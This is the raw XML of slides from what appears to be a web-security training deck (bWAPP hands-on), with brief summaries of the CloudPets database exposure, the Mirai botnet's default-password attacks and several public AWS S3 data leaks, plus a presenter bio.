                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Introduction.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3636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430" name="Shape 430"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="152400"/>
            <a:ext cx="4227624" cy="4339751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Shape 431"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581975" y="157225"/>
            <a:ext cx="4227600" cy="4177800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" dirty="0"/>
              <a:t>Simple google search will show many results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" dirty="0"/>
              <a:t>If user does not educate himself about the settings, and the product manufacturer does not place defaults carefully, this will always happen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" dirty="0"/>
              <a:t>This could range from something as simple as allowing excessive permissions to a user account, to failing to restrict resource access to external addresses.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Shape 437"/>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438" name="Shape 438"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4062"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2452140" y="108409"/>
            <a:ext cx="3959795" cy="46421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Shape 437"/>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2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA6DEF8C-15FA-43DE-92FD-0AE15D016CE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4506686" y="444906"/>
            <a:ext cx="4572000" cy="2462213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>CloudPets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>CloudPets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>’ MongoDB was unprotected with a password, and while they were attempts by multiple researchers (Notably, Troy Hunt) and users to alert Spiral Toys, nothing was done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>A large amount of data was lost, including recorded conversations, profile pictures, as well as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> passwords with no password strength requirements, and a total of 821,000 user records.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="CloudPets database">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{631C6EAC-3B67-4514-96D1-D12525A98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68" y="139958"/>
            <a:ext cx="3911088" cy="445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236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Shape 437"/>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5" name="Picture 4" descr="Cracked bcrypt hashes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05176740-F1CA-4212-BFA0-FD0BB8351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746" y="350197"/>
            <a:ext cx="7354325" cy="402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977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Shape 437"/>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4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E314B71-2C62-4608-B0A3-04F9E06ACBAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395416" y="257029"/>
            <a:ext cx="4572000" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>Mirai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>未来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>Mirai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t> was a botnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>utilising</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t> IoT devices, managing to execute several high-profile attacks after discovery, with the creator going to ground after releasing the code as open source (Anna-senpai).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Mirai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> ran from CCTV cameras, DVRs and routers. Essentially worked by trying common passwords, something that can be easily avoided. The entirety of the password list used it included below:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>With such a simple method, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Mirai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> botnet produced 280 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Gbps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and 130 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Mpps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> in DDOS capability, attacking DNS provider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Dyn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, leading to inaccessibility of sites such as GitHub, Twitter, Reddit, Netflix, Airbnb.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://cdn-images-1.medium.com/max/1600/0*KnZhD1qAeHyWWRtz.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951C369F-6ACE-4F90-A766-79AF535666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4324" y="367099"/>
            <a:ext cx="6096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80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Shape 443"/>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ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Security Misconfiguration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Special mention: AWS S3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450" name="Shape 450"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295674" y="884950"/>
            <a:ext cx="3982225" cy="2967912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>June 8th, 2017, UpGuard Director of Cyber Risk Research Chris Vickery discovered a cloud-based Amazon S3 data repository that was fully downloadable and configured to allow public access. The database and its many terabytes of contents could thus be accessed simply by entering the S3 URL. six million and 14 million Verizon customers were left on an unprotected server belonging to a partner of the telecommunications firm. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="444444"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" dirty="0"/>
              <a:t>https://threatpost.com/third-party-exposes-14-million-verizon-customer-records/126798/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="451" name="Shape 451"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4277900" y="281925"/>
            <a:ext cx="4219575" cy="2190750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="452" name="Shape 452"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4277899" y="3099250"/>
            <a:ext cx="4331000" cy="7536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Shape 458"/>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459" name="Shape 459"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="3103275"/>
            <a:ext cx="8253300" cy="1035000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
              </a:rPr>
              <a:t>As discovered by Chris Vickery, a cyber risk analyst at UpGuard, and reported by Gizmodo, an analytics firm hired by the Republican National Committee left the data of 198 million U.S. voters sitting out in the open on a public server. The more than a terabyte of data, owned by Deep Root Analytics, included personal identifying information like birth dates, home addresses and phone numbers as well as demographic info like ethnicity and religion.</a:t>
            </a:r>
            <a:endParaRPr lang="ko" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E433E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9F9"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="460" name="Shape 460"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="-11160" b="53185"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="212049"/>
            <a:ext cx="8664049" cy="2356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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278294" y="320271"/>
            <a:ext cx="6783174" cy="1573845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" dirty="0"/>
              <a:t>On May 24, Chris Vickery, a cyber risk analyst with the security firm UpGuard, discovered a publicly accessible data cache on Amazon Web Services' S3 storage service that contained intelligence data. The cache was posted to an account linked to defense and intelligence contractor Booz Allen Hamilton. And the files within were connected to the US National Geospatial-Intelligence Agency (NGA), the US military's provider of battlefield satellite and drone surveillance imagery.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="467" name="Shape 467"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2258400" y="2264300"/>
            <a:ext cx="4476750" cy="2000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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51435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en-US" altLang="ko" sz="4000" dirty="0" err="1">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>bWAPP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t> Hands On Part 1.</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="4000" dirty="0">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205979"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Introduction.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Shape 175"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3394472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Lim Quan Heng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Cyber Operations Consultant, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Horangi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="20252D"/>
              </a:solidFill>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Syrup (Passive consumer movement intelligence)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Thinges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (Handmade e-commerce platform)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>PriceWaterhouseCoopers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> Consulting (Technology)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>OSCP, CREST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="20252D"/>
              </a:solidFill>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2542987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2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F1730E5-F736-42C6-A728-D0EC785C97B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280416" y="353568"/>
            <a:ext cx="8570976" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
